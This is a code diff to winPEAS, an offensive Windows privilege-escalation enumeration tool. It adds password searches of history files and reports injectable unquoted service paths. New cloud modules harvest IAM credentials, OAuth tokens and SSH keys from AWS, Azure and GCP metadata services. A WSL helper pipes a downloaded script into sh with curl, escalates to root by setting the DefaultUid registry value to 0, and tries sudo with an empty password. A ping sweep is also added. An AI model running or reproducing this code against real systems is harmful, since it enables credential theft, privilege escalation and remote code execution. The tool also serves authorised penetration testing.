--- a/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs
@@ -5,8 +5,10 @@ using System.IO;
using System.Linq;
using System.Management;
using System.Text.RegularExpressions;
+using winPEAS.Checks;
using winPEAS.Helpers;
using winPEAS.Helpers.Registry;
+using winPEAS.Helpers.YamlConfig;
namespace winPEAS.Info.ApplicationInfo
{
@@ -256,6 +258,9 @@ namespace winPEAS.Info.ApplicationInfo
{
}
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
+
results.Add(new Dictionary()
{
{"Reg", autorunLocation[0] + "\\" + autorunLocation[1]},
@@ -274,7 +279,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
},
- {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(filepath).ToString()}
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
@@ -299,6 +304,9 @@ namespace winPEAS.Info.ApplicationInfo
orig_filepath = Environment.ExpandEnvironmentVariables(orig_filepath).Replace("'", "").Replace("\"", "");
string folder = Path.GetDirectoryName(orig_filepath);
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(orig_filepath, out injectablePaths);
+
results.Add(new Dictionary()
{
{"Reg", autorunLocation[0] + "\\" + reg},
@@ -317,7 +325,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
},
- {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(orig_filepath).ToString()}
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
@@ -342,6 +350,12 @@ namespace winPEAS.Info.ApplicationInfo
string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE"));
usersPath = Directory.GetParent(usersPath).FullName;
+ var config = YamlConfigHelper.GetWindowsSearchConfig();
+ var pwdInsideHistory = config.variables.FirstOrDefault(v => v.name.Equals("pwd_inside_history", StringComparison.InvariantCultureIgnoreCase)).value;
+ // add .* around each element to match the whole line
+ var items = pwdInsideHistory.Split('|').Select(v => $".*{v}.*");
+ pwdInsideHistory = string.Join("|", items);
+
try
{
if (Directory.Exists(usersPath))
@@ -373,6 +387,14 @@ namespace winPEAS.Info.ApplicationInfo
foreach (string filepath in files)
{
+ var fileContent = File.ReadAllText(filepath);
+ var sensitiveInfoList = FileAnalysis.SearchContent(fileContent, pwdInsideHistory, false);
+ // remove all non-printable and control characters
+ sensitiveInfoList = sensitiveInfoList.Select(s => s = Regex.Replace(s, @"\p{C}+", string.Empty)).ToList();
+
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
+
string folder = Path.GetDirectoryName(filepath);
results.Add(new Dictionary() {
{ "Reg", "" },
@@ -383,7 +405,8 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))},
- { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" },
+ { "sensitiveInfoList", string.Join(", ", sensitiveInfoList) },
});
}
}
@@ -403,6 +426,9 @@ namespace winPEAS.Info.ApplicationInfo
{
try
{
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(folder, out injectablePaths);
+
results.Add(new Dictionary() {
{ "Reg", "" },
{ "RegKey", "" },
@@ -412,7 +438,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", ""},
- { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(folder).ToString() }
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
catch (Exception)
@@ -447,6 +473,9 @@ namespace winPEAS.Info.ApplicationInfo
try
{
string folder = Path.GetDirectoryName(filepathCleaned);
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(command, out injectablePaths);
+
results.Add(new Dictionary()
{
{"Reg", ""},
@@ -463,7 +492,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))
},
- {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(command).ToString()}
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
catch (Exception)
@@ -505,6 +534,8 @@ namespace winPEAS.Info.ApplicationInfo
if (File.Exists(path))
{
string folder = Path.GetDirectoryName(path);
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(path, out injectablePaths);
results.Add(new Dictionary
{
@@ -516,7 +547,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(path, Checks.Checks.CurrentUserSiDs))},
- { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs
new file mode 100644
index 0000000..71e7bc1
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs
@@ -0,0 +1,201 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Net;
+using winPEAS.Helpers;
+
+namespace winPEAS.Info.CloudInfo
+{
+ internal class AWSInfo : CloudInfoBase
+ {
+ /*
+ * notes - possible identification:
+ *
+ - "c:\Program Files\Amazon\EC2Launch"
+ - "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
+ - "c:\Program Files (x86)\AWS SDK for .NET"
+ - get EC2_TOKEN: PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600", it should start with "AQ"
+ */
+
+ const string AWS_FOLDER = "c:\\Program Files\\Amazon\\";
+ const string AWS_BASE_URL = "http://169.254.169.254/latest/api/token";
+ const string METADATA_URL_BASE = "http://169.254.169.254/latest/meta-data";
+
+
+ public override string Name => "AWS EC2";
+
+ private Dictionary> _endpointData = null;
+
+ public override bool IsCloud => Directory.Exists(AWS_FOLDER);
+
+ public override Dictionary> EndpointDataList()
+ {
+ if (_endpointData == null)
+ {
+ _endpointData = new Dictionary>();
+
+ try
+ {
+ if (IsAvailable)
+ {
+ string API_TOKEN = CreateMetadataAPIRequest(AWS_BASE_URL, "PUT", new WebHeaderCollection { { "X-aws-ec2-metadata-token-ttl-seconds", "21600" } });
+
+ _endpointData.Add("General Info", GetGeneralMetadataInfo(API_TOKEN));
+ _endpointData.Add("Account Info", GetAccountMetadataInfo(API_TOKEN));
+ _endpointData.Add("Network Info", GetNetworkMetadataInfo(API_TOKEN));
+ _endpointData.Add("IAM Role", GetIAMRoleMetadataInfo(API_TOKEN));
+ _endpointData.Add("User Data", GetUserDataMetadataInfo(API_TOKEN));
+ _endpointData.Add("EC2 Security Credentials", GetSecurityCredentialsMetadataInfo(API_TOKEN));
+
+ /*
+ * print_3title "SSM Runnig"
+ ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
+ *
+ */
+ }
+ else
+ {
+ _endpointData.Add("General Info", new List()
+ {
+ new EndpointData()
+ {
+ EndpointName = "",
+ Data = null,
+ IsAttackVector = false
+ }
+ });
+ }
+ }
+ catch (Exception ex)
+ {
+ Beaprint.PrintException(ex.Message);
+ }
+ }
+
+ return _endpointData;
+ }
+
+ private List GetSecurityCredentialsMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("ec2-instance", "identity-credentials/ec2/security-credentials/ec2-instance", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetUserDataMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("user-data", "latest/user-data", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetIAMRoleMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>
+ {
+ new Tuple("iam/info", "iam/info", false)
+ };
+
+ var url = $"{METADATA_URL_BASE}/iam/security-credentials/";
+ var roles = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
+
+ foreach (var role in roles.Split('\n'))
+ {
+ metadataEndpoints.Add(new Tuple(role, $"iam/security-credentials/{role}", false));
+ }
+
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetNetworkMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>();
+
+ var url = $"{METADATA_URL_BASE}/network/interfaces/macs/";
+ var macs = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
+ var urlBase = "network/interfaces/macs";
+
+ foreach (var mac in macs.Split('\n'))
+ {
+ metadataEndpoints.Add(new Tuple("Owner ID", $"{urlBase}/{mac}/owner-id", false));
+ metadataEndpoints.Add(new Tuple("Public Hostname", $"{urlBase}/{mac}/public-hostname", false));
+ metadataEndpoints.Add(new Tuple("Security Groups", $"{urlBase}/{mac}/security-groups", false));
+ metadataEndpoints.Add(new Tuple("Private IPv4s", $"{urlBase}/{mac}/ipv4-associations/", false));
+ metadataEndpoints.Add(new Tuple("Subnet IPv4", $"{urlBase}/{mac}/subnet-ipv4-cidr-block", false));
+ metadataEndpoints.Add(new Tuple("Private IPv6s", $"{urlBase}/{mac}/ipv6s", false));
+ metadataEndpoints.Add(new Tuple("Subnet IPv6", $"{urlBase}/{mac}/subnet-ipv6-cidr-blocks", false));
+ metadataEndpoints.Add(new Tuple("Public IPv4s", $"{urlBase}/{mac}/public-ipv4s", false));
+ }
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetAccountMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("account info", "identity-credentials/ec2/info", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetGeneralMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("ami id", "ami-id", false),
+ new Tuple("instance action","instance-action", false),
+ new Tuple("instance id","instance-id", false),
+ new Tuple("instance life-cycle","instance-life-cycle", false),
+ new Tuple("instance type","instance-type", false),
+ new Tuple("placement/region","placement/region", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetMetadataInfo(List> endpointData, string apiToken)
+ {
+ List _endpointDataList = new List();
+
+ foreach (var tuple in endpointData)
+ {
+ string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
+
+ var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
+
+ _endpointDataList.Add(new EndpointData()
+ {
+ EndpointName = tuple.Item1,
+ Data = result,
+ IsAttackVector = tuple.Item3
+ });
+ }
+
+ return _endpointDataList;
+ }
+
+ public override bool TestConnection()
+ {
+ return CreateMetadataAPIRequest(AWS_BASE_URL, "GET") != null;
+ }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs
new file mode 100644
index 0000000..e37f19f
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs
@@ -0,0 +1,88 @@
+using System.Collections.Generic;
+using System.IO;
+using System.Net;
+using System;
+
+namespace winPEAS.Info.CloudInfo
+{
+ internal class AzureInfo : CloudInfoBase
+ {
+ public override string Name => "Azure VM";
+ public override bool IsCloud => Directory.Exists(WINDOWS_AZURE_FOLDER);
+
+ private Dictionary> _endpointData = null;
+
+ const string WINDOWS_AZURE_FOLDER = "c:\\windowsazure";
+ const string AZURE_BASE_URL = "http://169.254.169.254/metadata/";
+ const string API_VERSION = "2021-12-13";
+
+ public override Dictionary> EndpointDataList()
+ {
+ if (_endpointData == null)
+ {
+ _endpointData = new Dictionary>();
+ List _endpointDataList = new List();
+
+ try
+ {
+ string result;
+
+ List> endpoints = new List>()
+ {
+ new Tuple("Instance Details", $"instance?api-version={API_VERSION}", false),
+ new Tuple("Load Balancer details", $"loadbalancer?api-version={API_VERSION}", false),
+ new Tuple("Management token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://management.azure.com/", true),
+ new Tuple("Graph token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://graph.microsoft.com/", true),
+ new Tuple("Vault token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://vault.azure.net/", true),
+ new Tuple("Storage token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://storage.azure.com/", true)
+ };
+
+ if (IsAvailable)
+ {
+
+
+ foreach (var tuple in endpoints)
+ {
+ string url = $"{AZURE_BASE_URL}{tuple.Item2}";
+
+ result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "Metadata", "true" } });
+
+ _endpointDataList.Add(new EndpointData()
+ {
+ EndpointName = tuple.Item1,
+ Data = result,
+ IsAttackVector = tuple.Item3
+ });
+ }
+
+
+ }
+ else
+ {
+ foreach (var endpoint in endpoints)
+ {
+ _endpointDataList.Add(new EndpointData()
+ {
+ EndpointName = endpoint.Item1,
+ Data = null,
+ IsAttackVector = false
+ });
+ }
+ }
+
+ _endpointData.Add("General", _endpointDataList);
+ }
+ catch (Exception ex)
+ {
+ }
+ }
+
+ return _endpointData;
+ }
+
+ public override bool TestConnection()
+ {
+ return CreateMetadataAPIRequest(AZURE_BASE_URL, "GET") != null;
+ }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs
new file mode 100644
index 0000000..6827f08
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs
@@ -0,0 +1,77 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Net;
+using System.Net.Sockets;
+using System.Text;
+
+namespace winPEAS.Info.CloudInfo
+{
+ internal abstract class CloudInfoBase
+ {
+ public abstract string Name { get; }
+
+ public abstract bool IsCloud { get; }
+
+ public abstract Dictionary> EndpointDataList();
+
+ public abstract bool TestConnection();
+
+ private bool? _isAvailable;
+ public bool IsAvailable
+ {
+ get
+ {
+ if (_isAvailable == null)
+ {
+ _isAvailable = TestConnection();
+ }
+
+ return _isAvailable.Value;
+ }
+ }
+
+ protected string CreateMetadataAPIRequest(string url, string method, WebHeaderCollection headers = null)
+ {
+ try
+ {
+ var request = WebRequest.CreateHttp(url);
+
+ if (headers != null)
+ {
+ request.Headers = headers;
+ }
+
+ request.Method = method;
+
+ using (var response = (HttpWebResponse)request.GetResponse())
+ {
+ using (var responseStream = response.GetResponseStream())
+ {
+ // Get a reader capable of reading the response stream
+ using (var myStreamReader = new StreamReader(responseStream, Encoding.UTF8))
+ {
+ // Read stream content as string
+ var content = myStreamReader.ReadToEnd();
+
+ return content;
+ }
+ }
+ }
+ }
+ catch (WebException exception)
+ {
+ if (exception.InnerException != null)
+ {
+ return typeof(SocketException) == exception.InnerException.GetType() ? null : string.Empty;
+ }
+ }
+ catch (Exception ex)
+ {
+ return string.Empty;
+ }
+
+ return string.Empty;
+ }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs
new file mode 100644
index 0000000..427486b
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs
@@ -0,0 +1,10 @@
+namespace winPEAS.Info.CloudInfo
+{
+ internal class EndpointData
+ {
+ public string EndpointName { get; set; }
+ public string Data { get; set; }
+
+ public bool IsAttackVector { get; set; }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs
new file mode 100644
index 0000000..d393b57
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs
@@ -0,0 +1,208 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Net;
+using winPEAS.Helpers;
+
+namespace winPEAS.Info.CloudInfo
+{
+ internal class GCPInfo : CloudInfoBase
+ {
+ public override string Name => "Google Cloud Platform";
+
+ const string GCP_BASE_URL = "http://{URL_BASE}/";
+ const string GCP_FOLDER = "C:\\Program Files\\Google\\Compute Engine\\";
+
+ /*
+ C:\Program Files\Google\Compute Engine\agent\GCEWindowsAgent.exe"
+ C:\Program Files\Google\OSConfig\google_osconfig_agent.exe"
+ c:\Program Files (x86)\Google\Cloud SDK"
+ http://metadata.google.internal
+ */
+
+ public override bool IsCloud => Directory.Exists(GCP_FOLDER);
+
+ private Dictionary> _endpointData = null;
+
+ const string METADATA_URL_BASE = "http://metadata.google.internal/computeMetadata/v1";
+
+
+ public override Dictionary> EndpointDataList()
+ {
+ if (_endpointData == null)
+ {
+ _endpointData = new Dictionary>();
+
+ try
+ {
+ if (IsAvailable)
+ {
+ _endpointData.Add("GC Project Info", GetGCProjectMetadataInfo());
+ _endpointData.Add("OSLogin Info", GetOSLoginMetadataInfo());
+ _endpointData.Add("Instance Info", GetInstanceMetadataInfo());
+ _endpointData.Add("Interfaces", GetInterfacesMetadataInfo());
+ _endpointData.Add("User Data", GetUserMetadataInfo());
+ _endpointData.Add("Service Accounts", GetServiceAccountsMetadataInfo());
+ }
+ else
+ {
+ _endpointData.Add("General Info", new List()
+ {
+ new EndpointData()
+ {
+ EndpointName = "",
+ Data = null,
+ IsAttackVector = false
+ }
+ });
+ }
+ }
+ catch (Exception ex)
+ {
+ Beaprint.PrintException(ex.Message);
+ }
+ }
+
+ return _endpointData;
+ }
+
+ private List GetServiceAccountsMetadataInfo()
+ {
+ var metadataEndpoints = new List>();
+
+ var serviceAccountsEndpointUrlBase = "instance/service-accounts";
+ var url = $"{METADATA_URL_BASE}/{serviceAccountsEndpointUrlBase}";
+ var serviceAccounts = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
+
+ // TODO
+ // echo " Name: $sa" - ignored for now
+
+ foreach (var serviceAccount in serviceAccounts.Trim().Split('\n'))
+ {
+ metadataEndpoints.Add(new Tuple("Email", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}email", false));
+ metadataEndpoints.Add(new Tuple("Aliases", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}aliases", false));
+ metadataEndpoints.Add(new Tuple("Identity", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}identity", false));
+ metadataEndpoints.Add(new Tuple("Scopes", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}scopes", false));
+ metadataEndpoints.Add(new Tuple("Token", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}token", false));
+ }
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+ }
+
+ private List GetUserMetadataInfo()
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("startup-script", "instance/attributes/startup-script", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+ }
+
+ private List GetInterfacesMetadataInfo()
+ {
+ var metadataEndpoints = new List>();
+
+ var networkEndpointUrlBase = "instance/network-interfaces";
+ var url = $"{METADATA_URL_BASE}/{networkEndpointUrlBase}";
+ var ifaces = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
+
+ foreach (var iface in ifaces.Trim().Split('\n'))
+ {
+ metadataEndpoints.Add(new Tuple("IP", $"{networkEndpointUrlBase}/{iface}ip", false));
+ metadataEndpoints.Add(new Tuple("Subnetmask", $"{networkEndpointUrlBase}/{iface}subnetmask", false));
+ metadataEndpoints.Add(new Tuple("Gateway", $"{networkEndpointUrlBase}/{iface}gateway", false));
+ metadataEndpoints.Add(new Tuple("DNS", $"{networkEndpointUrlBase}/{iface}dns-servers", false));
+ metadataEndpoints.Add(new Tuple("Network", $"{networkEndpointUrlBase}/{iface}network", false));
+ }
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+ }
+
+ private List GetInstanceMetadataInfo()
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("Instance Description", "instance/description", false),
+ new Tuple("Hostname", "instance/hostname", false),
+ new Tuple("Instance ID", "instance/id", false),
+ new Tuple("Instance Image", "instance/image", false),
+ new Tuple("Machine Type", "instance/machine-type", false),
+ new Tuple("Instance Name", "instance/name", false),
+ new Tuple("Instance tags", "instance/scheduling/tags", false),
+ new Tuple("Zone", "instance/zone", false),
+ new Tuple("K8s Cluster Location", "instance/attributes/cluster-location", false),
+ new Tuple("K8s Cluster name", "instance/attributes/cluster-name", false),
+ new Tuple("K8s OSLoging enabled", "instance/attributes/enable-oslogin", false),
+ new Tuple("K8s Kube-labels", "instance/attributes/kube-labels", false),
+ new Tuple("K8s Kubeconfig", "instance/attributes/kubeconfig", false),
+ new Tuple("K8s Kube-env", "instance/attributes/kube-env", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+
+ }
+ private List GetOSLoginMetadataInfo()
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("OSLogin users", "oslogin/users", false),
+ new Tuple("OSLogin Groups", "oslogin/groups", false),
+ new Tuple("OSLogin Security Keys", "oslogin/security-keys", false),
+ new Tuple("OSLogin Authorize", "oslogin/authorize", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+ }
+
+ private List GetGCProjectMetadataInfo()
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("Project-ID", "project/project-id", false),
+ new Tuple("Project Number", "project/numeric-project-id", false),
+ new Tuple("Project SSH-Keys", "project/attributes/ssh-keys", false),
+ new Tuple("All Project Attributes", "project/attributes/?recursive=true", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+ }
+
+ private List GetMetadataInfo(List> endpointData)
+ {
+ List _endpointDataList = new List();
+
+ foreach (var tuple in endpointData)
+ {
+ string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
+ var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
+
+ _endpointDataList.Add(new EndpointData()
+ {
+ EndpointName = tuple.Item1,
+ Data = result?.Trim(),
+ IsAttackVector = tuple.Item3
+ });
+ }
+
+ return _endpointDataList;
+ }
+
+ public override bool TestConnection()
+ {
+ return CreateMetadataAPIRequest(GCP_BASE_URL, "GET") != null;
+ }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs b/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs
new file mode 100644
index 0000000..7cce295
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs
@@ -0,0 +1,136 @@
+using System;
+using System.Diagnostics;
+using System.Text;
+using winPEAS.Helpers.Registry;
+
+namespace winPEAS.Info.FilesInfo.WSL
+{
+ public class WSLHelper
+ {
+ public static void RunLinpeas(string linpeasUrl)
+ {
+ string linpeasCmd = $"curl -L {linpeasUrl} --silent | sh";
+ var cmd = CreateUnixCommand(linpeasCmd);
+
+ ExecuteCommand(cmd.Item1, cmd.Item2);
+ }
+
+ internal static Tuple CreateUnixCommand(string command, string distributionName = null)
+ {
+ string wsl = Environment.Is64BitProcess
+ ? "wsl.exe"
+ : Environment.GetEnvironmentVariable("WinDir") + "\\SysNative\\wsl.exe";
+ string distributionParam = !string.IsNullOrEmpty(distributionName)
+ ? $"--distribution {distributionName}"
+ : string.Empty;
+ string args = $"{distributionParam} -- {command}";
+
+ return new Tuple(wsl, args);
+ }
+
+ static string GetWSLUser(string distributionName)
+ {
+ string command = "whoami";
+
+ var cmd = CreateUnixCommand(command, distributionName);
+ var user = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2)?.Trim();
+
+ return user;
+ }
+
+ internal static string TryGetRootUser(string distributionName, string distributionGuid)
+ {
+ string hive = "HKCU";
+ string path = @$"SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\{distributionGuid}";
+ string key = "DefaultUid";
+ string wslUser = GetWSLUser(distributionName);
+ string exploit = $"change registry value: '{hive}\\{path}\\{key}' to 0";
+ string root = $"root ({exploit})";
+
+ if (string.Equals(wslUser, "root"))
+ {
+ return "root";
+ }
+ var originalDefaultUserValue = RegistryHelper.GetRegValue(hive, path, key);
+
+ var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString());
+ if (isValueChanged)
+ {
+ wslUser = GetWSLUser(distributionName);
+
+ if (string.Equals(wslUser, "root"))
+ {
+ RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue);
+
+ return root;
+ }
+ }
+
+ // try sudo without password
+ exploit = "sudo with empty password";
+ var cmd = CreateUnixCommand("echo -n '' | sudo -S su root -c whoami", distributionName);
+ var output = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2);
+
+ if (output == "root")
+ {
+ return $"root ({exploit})";
+ }
+
+ return wslUser;
+ }
+
+ private static string ExecuteCommandWaitForOutput(string cmd, string args)
+ {
+ Process p = new Process();
+ p.StartInfo.UseShellExecute = false;
+ p.StartInfo.RedirectStandardOutput = true;
+ p.StartInfo.RedirectStandardError = true;
+ p.StartInfo.FileName = cmd;
+ p.StartInfo.Arguments = args;
+ p.StartInfo.StandardOutputEncoding = Encoding.UTF8;
+ p.Start();
+
+ string output = p.StandardOutput.ReadToEnd()?.Trim();
+
+ p.WaitForExit();
+
+ return output;
+ }
+
+ private static void ExecuteCommand(
+ string command,
+ string args = null,
+ string workingFolder = null
+ )
+ {
+ var processStartInfo = new ProcessStartInfo
+ {
+ UseShellExecute = false,
+ Verb = "OPEN",
+ CreateNoWindow = true,
+ FileName = command,
+ WorkingDirectory = workingFolder,
+ Arguments = args,
+ RedirectStandardOutput = true,
+ RedirectStandardError = true,
+ StandardOutputEncoding = Encoding.UTF8
+ };
+
+ using (var process = Process.Start(processStartInfo))
+ {
+ if (process != null)
+ {
+ while (!process.StandardOutput.EndOfStream)
+ {
+ Console.WriteLine(process.StandardOutput.ReadLine());
+ }
+
+ while (!process.StandardError.EndOfStream)
+ {
+ Console.WriteLine(process.StandardError.ReadLine());
+ }
+ }
+ }
+ }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs
new file mode 100644
index 0000000..298210a
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs
@@ -0,0 +1,56 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Net;
+using System.Net.NetworkInformation;
+using System.Threading.Tasks;
+
+namespace winPEAS.Info.NetworkInfo.NetworkScanner
+{
+ internal class NetPinger
+ {
+ private int PingTimeout = 1000;
+
+ public List HostsAlive = new List();
+
+ private List ipRange = new List();
+
+ public void AddRange(string baseIpAddress, string netmask)
+ {
+ var addresses = NetworkUtils.GetIPAddressesByNetmask(baseIpAddress, netmask).ToList();
+ var range = NetworkUtils.GetIPRange(IPAddress.Parse(addresses[0]), IPAddress.Parse(addresses[1]));
+
+ ipRange.AddRange(range);
+ }
+
+ public void AddRange(IEnumerable ipAddressList)
+ {
+ ipRange.AddRange(ipAddressList);
+ }
+
+ public async Task RunPingSweepAsync()
+ {
+ var tasks = new List();
+
+ foreach (var ip in ipRange)
+ {
+ Ping p = new Ping();
+ var task = PingAndUpdateStatus(p, ip);
+ tasks.Add(task);
+ }
+
+ await Task.WhenAll(tasks);
+ }
+
+ private async Task PingAndUpdateStatus(Ping ping, string ip)
+ {
+ var reply = await ping.SendPingAsync(ip, PingTimeout);
+
+ if (reply.Status == IPStatus.Success)
+ {
+ HostsAlive.Add(ip);
+ await Console.Out.WriteLineAsync(ip);
+ }
+ }
+ }
+}
